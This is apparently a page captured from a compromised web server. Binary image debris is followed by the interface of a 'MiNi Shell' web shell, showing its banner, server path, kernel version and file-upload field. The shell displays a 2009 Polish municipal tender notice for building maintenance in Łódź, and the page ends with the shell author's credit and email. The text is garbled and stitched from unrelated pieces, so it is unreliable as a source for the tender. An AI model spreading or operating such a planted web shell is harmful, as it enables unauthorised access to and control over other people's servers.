JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090211/36417-N-2009.html

<p class="kh_header"><b>Łódź: PRZETARG NIEOGRANICZONY NA WYKONYWANIE W RAMACH STAŁEJ OBSŁUGI KONSERWACJI I NAPRAW OGÓLNOBUDOWLANYCH, DEKARSKICH, WOD.- KAN., CO, CW, STOLARSKO-SZKLARSKICH, GAZOWYCH, ELEKTRYCZNYCH 
(O WARTOŚCI JEDNOSTKOWEJ NIE PRZEKRACZAJĄCEJ 2 500,00 ZŁ.), 
PRZY UŻYCIU PRZEZ WYKONAWCĘ WŁASNEGO MATERIAŁU I SPRZĘTU W NIERUCHOMOŚCIACH WSPÓLNOT MIESZKANIOWYCH ZARZĄDZANYCH PRZEZ ZGM WIDZEW WODNY RYNEK W 2009 R.</b><br>
<b>Numer ogłoszenia: 36417 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej Widzew Wodny Rynek , ul. Wysoka 44, 90-037 Łódź, woj. łódzkie, tel. 042 674-32-42, faks 042 674-33-37.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zgmwwr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY NA WYKONYWANIE W RAMACH STAŁEJ OBSŁUGI KONSERWACJI I NAPRAW OGÓLNOBUDOWLANYCH, DEKARSKICH, WOD.- KAN., CO, CW, STOLARSKO-SZKLARSKICH, GAZOWYCH, ELEKTRYCZNYCH 
(O WARTOŚCI JEDNOSTKOWEJ NIE PRZEKRACZAJĄCEJ 2 500,00 ZŁ.), 
PRZY UŻYCIU PRZEZ WYKONAWCĘ WŁASNEGO MATERIAŁU I SPRZĘTU W NIERUCHOMOŚCIACH WSPÓLNOT MIESZKANIOWYCH ZARZĄDZANYCH PRZEZ ZGM WIDZEW WODNY RYNEK W 2009 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonywanie w ramach stałej obsługi konserwacji, napraw, zabezpieczeń i remontów awaryjnych instalacji elektrycznych, wod-kan i budowlanych (wykonywanie prac konserwacyjnych, naprawczych i usuwania awarii murarsko-tynkarskich, ślusarskich, szklarskich i dekarskich) o wartości nie przekraczającej każdorazowo kwoty 2 500,00 zł  w nieruchomościach Wspólnot Mieszkaniowych administrowanych przez ZGM WWR  zgodnie z zakresem tj.
1) usuwanie usterek i  skutków awarii  
a/ 	wodno-kanalizacyjnych,
b/ 	co i cw,
c/	gazowych,
d/	stolarsko - szklarskich i ślusarskich,
e/	elektrycznych,
f/	ogólnobudowlanych
2)    dokonywanie napraw dekarsko-murarskich oraz innych robót ogólnobudowlanych
3)  konserwacji instalacji elektrycznej, zimnej wody i ciepłej wody, gazowych w zakresie pionów i instalacji wewnętrznej  
4) 	  usuwanie skutków awarii,
5)   zabezpieczenie obiektów przed okresem zimowym:
  a/ 	udrażnianie studzienek wod-kan. 
  b/ 	instalacji deszczowej, 
  c/ 		otworów okiennych ,drzwiowych, wyłazów dachowych  w klatkach schodowych i innych pomieszczeniach wspólnego użytku oraz instalacji w pralniach i w.c,
6)	  udział w eksmisjach oraz zabezpieczenie lokalu przed dostępem osób trzecich,
7)   dokonywanie odczytów wodomierzy, gazomierzy, liczników Zakładu Energetycznego  
8)   zgłaszanie do Zamawiającego zauważonych usterek, zagrożeń budowlanych
              i innych nieprawidłowości.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 4 000,00 zł 
Wadium należy wnosić przed terminem składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
1.	pieniądzu; 
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Genin Bank S. A. nr 56-1560-0013-2026-0000-2206-0001 
Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w sekretariacie Zakładu Gospodarki Mieszkaniowej  Łódź, ul. Wysoka 44 pok. nr 8
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzyma wadium wraz z odsetkami również w sytuacji, gdy wykonawca w odpowiedzi na wezwanie nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 pkt 2, bądź pełnomocnictw.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy:
1. 	Spełniają wszystkie wymagania wynikające z oświadczeń, których listę przedstawiono w punkcie Wymagane oświadczenia.
2. 	Załączą dokumenty wymienione w p-kcie 6.
3. 	Sposób oceny oferty - wg kryterium: 
a)	cena wynikająca z formularza cenowego - 80%
b)	cena wynikająca ze stawki (roboty nie objęte formularzem cenowym) - 20%
4. 	Sposób oceny warunków udziału - wg kryterium: 0 - 1
5. 	Oferenci muszą posiadać minimum następującego sprzętu niezbędnego do wykonania zamówienia:
-	miernik pomiaru napięcia,
-	miernik do pomiaru prądu (cęgi Dieca),
-	przyrząd do lokalizacji uszkodzenia obwodu elektrycznego,
-	miernik do pomiaru wartości izolacji przewodów,
-	narzędzia monterskie izolowane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania powinien złożyć w myśl art. 22.1. oświadczenie, że:
1)	posiada uprawnienia niezbędne do wykonania określonych prac lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajduje się w sytuacji finansowej zapewniającej wykonanie zamówienia,
4)	nie podlega wykluczeniu z postępowania na podstawie art. 24.1, 24.2 ustawy- załącznik nr 2
5)	jest dyspozycyjny minimum sześć dni w tygodniu,
6)	po zapoznaniu się z warunkami zamówienia akceptuje je bez zastrzeżeń.

6.  Lista wymaganych dokumentów

Od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. 
Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów z dnia 19.05.2006 r. (Dz. U z 2006 r. Nr 87 poz. 605; zmiany: Dz. U. z 2008 r. Nr. 188 poz. 1155) mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Wymaga się:
­	w przypadku składania oferty przez podmioty występujące wspólnie dokumenty wyszczególnione w pkt. 1. i 3. muszą być złożone przez każdy podmiot;
­	pełnomocnictwo w przypadku podmiotów występujących wspólnie i ustanowieniu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w  postępowaniu i zawarciu umowy w sprawie zamówienia publicznego;


1.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,

a.	aktualnego odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, w zakresie objętym tym zamówieniem, wystawiony nie wcześniej niż   6 miesięcy przed upływem składania ofert;
b.	aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków;
c.	aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;

2.	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: 

a.	wykaz wykonanych w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia minimum trzech zamówień zbliżonych zakresem rzeczowym i finansowym do przedmiotu zamówienia, popartych referencjami (dokumenty potwierdzające, że wszystkie roboty wymienione w w/w wykazie zostały wykonane należycie); z podaniem ich wartości i rodzaju, a jeżeli okres prowadzonej działalności jest krótszy - za ten okres z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie (załącznik nr 5),
b.	informacji na temat przeciętnej liczby zatrudnionych pracowników, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie,
c.	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, a także zakresu wykonywanych przez nich czynności (załącznik nr 3), oraz pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa i.wykonawca wskazał osoby, którymi będzie dysponował;
d.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca (załącznik nr 4), oraz pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania narządzi i urządzeń, jeżeli w wykazie, o którym mowa, i.wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
e.	dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeśli ustawy wymagają takich uprawnień.

3.	W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:

a)	bilans lub rachunek zysków i strat za ostatni rok, a w przypadku wykonawców nie zobowiązanych do sporządzenia bilansu - informacja określająca obroty, zysk oraz zobowiązania i należności ogółem,
b)	polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej okres realizacji prac;
c)	w przypadku załączenia dokumentu zawartego na okres krótszy, do oferty należy dołączyć zobowiązanie o przedłużeniu ważności ubezpieczenia.

4.	Ponadto:
1.	kserokopię uprawnień dozoru i eksploatacyjnych,
2.	kserokopię wpisu do Izby Inżynierów Budownictwa dla osoby kierującej robotami,
3.	polisa lub inny dokument ubezpieczenia , potwierdzający , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
4.	cennik ofertowy
5.	 wartość roboczogodziny z narzutami oraz procentowy wskaźnik kosztów zakupu materiałów,
6.	parafowany projekt umowy (załącznik nr 10),
7.	parafowany zakres czynności objęty przedmiotem zamówienia (załącznik nr 7).
Brak któregokolwiek z dokumentów powoduje wykluczenie oferenta z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgmwwr.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZGM Widzew - Wodny Rynek 
Adres: ul. Wysoka 44, 90-037 Łódź.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 09:55, miejsce: ZGM Widzew - Wodny Rynek 
Adres: ul. Wysoka 44, 90-037 Łódź
sekretariat - pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com